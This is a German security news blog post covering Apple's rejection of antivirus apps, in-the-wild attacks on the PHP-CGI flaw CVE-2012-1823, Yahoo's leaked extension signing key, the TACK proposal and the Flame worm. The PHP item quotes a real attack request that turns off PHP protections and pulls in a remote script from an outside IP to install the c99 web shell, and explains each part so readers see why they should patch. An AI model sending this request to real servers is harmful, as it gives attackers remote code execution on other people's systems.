Dipl.-Inform. Carsten Eilers

Apple möchte keinen Virenscanner von Kaspersky im App-Store haben (und auch keinen von anderen Herstellern, was ich sehr gut verstehen kann), und Eugene Kaspersky sieht nun den Untergang des Abendlandes von Kaspersky des iPhones kommen. Das er sich da evtl. irrt, hat z.B. David Harley beschrieben.

Betrachten wir es doch mal realistisch: Wo gibt es ständig Schadsoftware im Store? Richtig, bei Android. Wo gibt es Virenscanner? Richtig, auch bei Android. Viel zu helfen scheinen die aber nicht, oder? Vielleicht, weil sie zu spät kommen? Bisher ist Apple mit seinem geschlossenen System sehr gut gefahren, warum sollten sie also so etwas überflüssiges wie einen Virenscanner zulassen? Die einzige Gefahr, die einem nicht gejailbreakten iPhone droht, sind Angriffe auf Schwachstellen in den Apps oder im iOS. Wenn man also völlig überflüssige Apps gar nicht erst zulässt, besteht auch keine Gefahr, dass dadurch Schwachstellen entstehen. Ach ja: Niemand hindert Kaspersky daran, einen Virenscanner für iPhones mit Jailbreak zu veröffentlichen. Warum tut man das nicht, wenn es doch angeblich so nötig ist?

Angriffe auf PHP-CGI-Schwachstelle

Die Anfang Mai bekanntgewordene Schwachstelle in der CGI-Version von PHP (CVE-2012-1823), die in Version 5.4.3 und 5.3.13 behoben wurde, macht wieder von sich reden: Das ISC berichtet über Angriffe "in the wild". Als Beispiel wurde der Request

"GET /index.php?-dsafe_mode%3dOff+
-ddisable_functions%3dNULL+
-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+
-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt
HTTP/1.1"

genannt. Mit "-d" werden Optionen übergeben, und die machen folgendes:

• safe_mode=off schaltet den (seit PHP 5.3.0 überholten und seit PHP 5.4.0 entfernten) "Safe Mode" aus, durch den der Einsatz mancher Funktionen "sicherer" gemacht werden sollte.
• disable_functions=null löscht die Liste deaktivierter Funktionen, mit der der Admin potentiell gefährliche Funktionen wie z.B. system() oder exec() sperren kann. Evtl. gesperrte Funktionen sind dadurch wieder zugänglich.
• allow_url_fopen=on erlaubt das Öffnen von Dateien über HTTP und FTP.
• allow_url_include=on erlaubt das Einbinden von Skripten über HTTP und FTP
• auto_prepend_file=http://81.17.24.82/info3.txt bindet das angegebene Skript vor index.php ein und führt es aus.

Der Server mit dem einzubindenden Code antwortet inzwischen nicht mehr. Hugues Johnson hat den Angriff analysiert, bevor der Server offline ging, und konnte daher auch den nachgeladenen Code berücksichtigen: Ziel des Angriffs war es, die PHP-Shell c99.php auf dem Server zu speichern. Darüber kann der Angreifer dann auf den Webserver zugreifen.

Falls Sie also Ihre PHP-Installation noch nicht aktualisiert haben: Jetzt wird es langsam Zeit!

Yahoo! veröffentlicht privaten Schlüssel

Yahoo! hat einen neuen Browser für iPad und iPhone, genannt "Axis", sowie passende Erweiterungen für die Desktop-Versionen von Chrome, Firefox, Safari und Internet Explorer 9 veröffentlicht. Die Chrome-Version enthielt noch eine besondere Zugabe: Den privaten Schlüssel zum Signieren der Erweiterung. Ups. Da hat wohl jemand den Unterschied zwischen Signatur und Schlüssel nicht gekannt. Der Entdecker des privaten Schlüssels, Nik Cubrilovic, hat als "Proof of Concept" eine gefälschte Extension veröffentlicht, die Chrome als von Yahoo stammend anerkennt.

Inzwischen verwendet Yahoo einen neuen Schlüssel und der alte kann zurückgerufen werden. Ob Chrome überhaupt in der Lage ist, eine Signatur mit zurückgerufenen Schlüssel als falsch zu erkennen, ist nicht klar. Naja, falls Chrome das bisher nicht konnte, dürfte Google es ihm schnell beibringen, und nebenbei noch das entfleuchte Zertifikat im Browser sperren. Damit hat man ja Erfahrung, nur das bisher SSL-Zertifikate betroffen waren.

Verbesserung für TLS soll Vertrauen in Zertifikate erhöhen

Und da wir gerade bei SSL-Zertifikaten sind: Moxie Marlinspike und Trevor Perrin haben einen IETF-Draft veröffentlicht, der das Vertrauen in die Zertifikate erhöhen soll. TACK, die Kurzform von "Trust Assertions for Certificate Keys", ist ein Public-Key-Framework, mit dem ein Server die Authentizität seines Zertifikats beweisen kann. Da das ganze unabhängig von den Zertifizierungsstellen ist, könnte es in der Tat das Vertrauen in die Zertifikate erhöhen. Denn die sind ja nicht mehr besonders vertrauenswürdig, nachdem die CAs regelmäßig durch Probleme auffallen, und Alternativen sind rar.

Gibt es einen Stuxnet-Nachfolger?

Der Iran behauptet, von einem Wurm namens Flame (auch Flamer oder Skywiper genannt) angegriffen worden zu sein, bei dem es sich um einen Nachfolger von Stuxnet handeln soll. Bisher ist relativ wenig über den Wurm bekannt.

Das Laboratory of Cryptography and System Security (CrySyS) der Budapest University of Technology and Economics hat eine Analyse (PDF) veröffentlicht und vermutet, der Wurm wäre "developed by a government or nation state with signigficant budget and effort, and may be related to cyber warfare activities." Kaspersky hat den Wurm nach Anfragen der International Telecommunication Union ITU analysiert und hält ihn für "one of the most complex threats ever discovered".

Flame/Flamer/Skywiper scheint eine Art Super-Überraschungsei für Cyberkriminelle zu sein, der Schädling erfüllt etliche Wünsche auf einmal: Er ist eine Backdoor, ein Trojaner, ein Wurm, lässt sich durch Plugins beliebig erweitern, und wie er eingeschleust wird, ist noch gar nicht bekannt. Vermutlich dürfte also auch noch der Advanced Persistent Threat auf die Liste erfüllter Wünsche kommen. Da bin ich ja mal gespannt, was da am Ende für eine digitale eierlegende Wollmilchsau raus kommt.

Ach so: Laut Kaspersky sammelt der Schädling Informationen im mittleren Osten: Im Iran wurden 189 Infektionen gezählt, in Israel und Palästina 98, im Sudan 32, in Syrien 30, im Libanon 18, in Saudi Arabien 10 und in Ägypten 5. Fällt Ihnen an der Liste auch was auf? Richtig: Was hat Israel auf der Liste zu suchen? Eigentlich würde man da doch eher die Angreifer vermuten, wenn es gegen den Iran geht, oder? Das wird jedenfalls wieder lustig.

Carsten Eilers